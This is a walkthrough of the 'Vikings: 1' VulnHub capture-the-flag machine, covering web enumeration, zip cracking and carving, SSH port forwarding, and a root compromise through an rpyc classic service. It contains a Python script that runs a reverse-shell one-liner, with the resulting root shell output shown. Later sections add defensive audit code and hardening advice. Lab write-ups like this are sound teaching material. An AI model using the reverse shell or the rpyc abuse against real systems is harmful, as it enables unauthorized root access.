VIKINGS: 1 vulnhub walkthrough
2022-08-02 04:00:00 【xdeclearn】
VM address: https://www.vulnhub.com/entry/vikings-1,741/
Information
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Visit the web site.
Brute-force directories and files under the site directory; this turns up war.txt.
* vikings gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.94.129/site -x txt,php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.94.129/site
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,php
[+] Timeout: 10s
===============================================================
2021/09/16 03:06:43 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 322] [--> http://192.168.94.129/site/images/]
/css (Status: 301) [Size: 319] [--> http://192.168.94.129/site/css/]
/js (Status: 301) [Size: 318] [--> http://192.168.94.129/site/js/]
/war.txt (Status: 200) [Size: 13]
The file points to another directory, /war-is-over. Browsing there and downloading index.html gives a base64-encoded blob; decoding it and inspecting the bytes shows that it is a zip archive.
It is a password-protected zip archive, so crack it with john (the procedure for cracking a zip with john can be looked up on Baidu). Using rockyou.txt as the wordlist gives the password ragnarok123. Extracting the archive yields a file named king; inspecting it with binwalk shows yet another zip archive embedded inside the file.
* vikings binwalk king
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, EXIF standard
12 0xC TIFF image data, big-endian, offset of first image directory: 8
1429567 0x15D03F Zip archive data, at least v2.0 to extract, compressed size: 53, uncompressed size: 92, name: user
1429740 0x15D0EC End of Zip archive, footer length: 22
Use dd to carve out the zip archive containing user; it yields the first username and password, floki/[email protected].
* vikings cat user
//[email protected]
//[email protected]
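The two manual triage steps above (decode the base64 blob and recognise it as a zip from its leading bytes; locate the archive binwalk reported inside king and cut it out with dd) can be done in a few lines of Python. The following is an added example, not code from the original walkthrough: the carrier file is constructed in memory (a JPEG-like prefix followed by a small zip), and the archive boundaries are taken from the zip local-file-header and end-of-central-directory signatures rather than hard-coded offsets, with binwalk's DECIMAL offset accepted as an optional hint.

```python
#!/usr/bin/env python3
"""Added example, not code from the original walkthrough: identify a decoded
blob by its magic bytes (the `file` check) and carve a zip archive embedded in
another file (the binwalk + dd step). Sample data is constructed in-line."""
from __future__ import annotations

import base64
import io
import zipfile

ZIP_LOCAL_HEADER = b"PK\x03\x04"   # start of the first zip member
ZIP_EOCD = b"PK\x05\x06"           # end-of-central-directory record (22 bytes + comment)

MAGIC = {
    ZIP_LOCAL_HEADER: "zip",
    b"\xff\xd8\xff": "jpeg",
}


def identify(data: bytes) -> str:
    """Classify data by its leading bytes, the way `file` does for these formats."""
    for signature, name in MAGIC.items():
        if data.startswith(signature):
            return name
    return "unknown"


def decode_base64_blob(text: str) -> bytes:
    """Decode a base64 text blob such as the one served as index.html; whitespace is ignored."""
    return base64.b64decode("".join(text.split()), validate=True)


def find_embedded_zip(data: bytes, offset: int | None = None) -> tuple[int, int] | None:
    """Return (start, end) of a zip embedded in `data`, or None.

    `offset` is the DECIMAL offset binwalk reported; without it the first local
    file header is used. The end is computed from the EOCD record, whose last
    two bytes give the length of a trailing archive comment.
    """
    start = data.find(ZIP_LOCAL_HEADER) if offset is None else offset
    if start < 0 or not data.startswith(ZIP_LOCAL_HEADER, start):
        return None
    eocd = data.rfind(ZIP_EOCD, start)
    if eocd < 0:
        return None
    comment_len = int.from_bytes(data[eocd + 20:eocd + 22], "little")
    return start, eocd + 22 + comment_len


def carve_zip(data: bytes, offset: int | None = None) -> bytes | None:
    """Slice the embedded archive out of its carrier (what the dd step did)."""
    span = find_embedded_zip(data, offset)
    return None if span is None else data[span[0]:span[1]]


def list_zip_entries(zip_bytes: bytes) -> dict[str, bytes]:
    """Read every member of the carved archive into memory."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return {info.filename: zf.read(info) for info in zf.infolist()}


def build_sample_carrier() -> bytes:
    """Constructed test input: a JPEG-like prefix followed by a one-member zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("user", "placeholder credential file\n")
    jpeg_like = b"\xff\xd8\xff\xe1" + b"\x00" * 1000  # not a real image
    return jpeg_like + buf.getvalue()


if __name__ == "__main__":
    carrier = build_sample_carrier()
    print("carrier looks like:", identify(carrier))
    start, end = find_embedded_zip(carrier)
    print(f"embedded zip at bytes {start}..{end}")
    for name, content in list_zip_entries(carve_zip(carrier, start)).items():
        print(f"  {name}: {content!r}")
```

Searching for the first `PK\x03\x04` is a heuristic: real JPEG metadata can contain that byte sequence by chance, which is why the function accepts binwalk's reported offset and checks that a local file header really starts there before trusting it.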
Privilege escalation
Log in over ssh as floki and check the listening ports: port 18812 is open, and the process list shows rpyc running as root, so this process is used to escalate privileges. Note that the server does not allow outbound connections, so a shell cannot be bounced out directly; instead ssh local port forwarding (forward port 18812 to the attacking machine) and remote port forwarding (forward the attacking machine's listening port to the target machine) are used.
[email protected]:~$ ss -tnlp
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 127.0.0.1:45935 0.0.0.0:*
LISTEN 0 128 0.0.0.0:80 0.0.0.0:*
LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 127.0.0.1:18812 0.0.0.0:*
LISTEN 0 128 127.0.0.1:8000 0.0.0.0:*
[email protected]:~$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1087 0.0 2.2 209144 22376 ? Sl 14:14 0:04 python3 /usr/local/bin/rpyc_classic.py
On the attacking machine, forward the target host's port 18812 to the local machine:
ssh -CfNg -L 18812:127.0.0.1:18812 [email protected]
Forward the attacking machine's local port 8000 to port 8000 on the target host:
ssh -CfNg -R 8000:192.168.94.128:8000 [email protected]
Then run the following Python code on the attacking machine (the rpyc library must be installed locally).
#!/usr/bin/python3
# Use the server's execute method to spawn a shell that connects back to local port 8000
import rpyc
# rpyc classic connects to port 18812 by default, which ssh has forwarded to the target
conn = rpyc.classic.connect("localhost")
# The code runs on the target inside the rpyc process, i.e. as root here
conn.execute('import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",8000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);')
conn.close()
Root privileges obtained successfully.
* ~ rlwrap nc -lvp 8000
listening on [any] 8000 ...
192.168.94.128: inverse host lookup failed: Host name lookup failure
connect to [192.168.94.128] from (UNKNOWN) [192.168.94.128] 53968
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt
# cat root.txt
f0b98d4387ff6da77317e582da98bf31
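The root cause here is an rpyc classic server running as root: its protocol lets any connected client execute arbitrary Python, and binding it to 127.0.0.1 only hides it from the network, not from local users or from anyone who can forward a port over SSH. The following is an added audit check, not part of the original walkthrough, that parses `ss -tnlp` and `ps aux` output (constructed here from the listings shown above, plus one hypothetical user shell) and flags such services along with the account they run under.

```python
#!/usr/bin/env python3
"""Added audit check, not part of the original walkthrough: flag privileged
processes that expose a code-execution service, using the `ss -tnlp` and
`ps aux` listings shown above as constructed sample input."""

# Sample listener table, constructed from the ss output in the post.
SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port
LISTEN 0      128    127.0.0.1:45935      0.0.0.0:*
LISTEN 0      128    0.0.0.0:80           0.0.0.0:*
LISTEN 0      128    127.0.0.53%lo:53     0.0.0.0:*
LISTEN 0      128    0.0.0.0:22           0.0.0.0:*
LISTEN 0      128    127.0.0.1:18812      0.0.0.0:*
LISTEN 0      128    127.0.0.1:8000       0.0.0.0:*
"""

# Sample process table, constructed from the ps output in the post plus one
# hypothetical user shell so the filter has something to skip.
PS_OUTPUT = """\
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1087 0.0 2.2 209144 22376 ? Sl 14:14 0:04 python3 /usr/local/bin/rpyc_classic.py
floki 2201 0.0 0.1 8200 3300 pts/0 Ss 14:20 0:00 -bash
"""

# Services whose protocol lets any connected client run arbitrary code.
# The rpyc classic server listens on 18812 by default.
RCE_SERVICES = {"rpyc_classic.py": 18812}

LOOPBACK = ("127.0.0.1", "::1", "[::1]")


def parse_listeners(ss_text):
    """Map local port -> bind address for every LISTEN row of `ss -tnlp` output."""
    listeners = {}
    for line in ss_text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue
        addr, _, port = fields[3].rpartition(":")
        listeners[int(port)] = addr
    return listeners


def parse_processes(ps_text):
    """Return (user, pid, command) tuples from `ps aux` output."""
    procs = []
    for line in ps_text.splitlines()[1:]:
        fields = line.split(None, 10)   # COMMAND keeps its own spaces
        if len(fields) == 11:
            procs.append((fields[0], int(fields[1]), fields[10]))
    return procs


def audit(ss_text, ps_text):
    """Return one finding per process running a known RCE service."""
    listeners = parse_listeners(ss_text)
    findings = []
    for user, pid, cmd in parse_processes(ps_text):
        for service, port in RCE_SERVICES.items():
            if service not in cmd:
                continue
            bind = listeners.get(port)
            finding = {
                "pid": pid,
                "user": user,
                "service": service,
                "port": port,
                "bind": bind,
                # Anything this service runs inherits the process owner's privileges.
                "severity": "CRITICAL" if user == "root" else "HIGH",
            }
            if bind in LOOPBACK:
                finding["note"] = ("loopback-only binding still reaches every local "
                                   "user and anyone who can forward a port over SSH")
            else:
                finding["note"] = "service reachable from the network"
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in audit(SS_OUTPUT, PS_OUTPUT):
        print(f"[{f['severity']}] pid {f['pid']} ({f['user']}) runs {f['service']} "
              f"on {f['bind']}:{f['port']}: {f['note']}")
```

The fix on the host side is to not run rpyc classic at all on a multi-user machine, or at least to run it under an unprivileged account; on the SSH side, `AllowTcpForwarding no` (or a restrictive `PermitOpen`) in sshd_config removes the forwarding path that turned a loopback-only listener into a remotely reachable one.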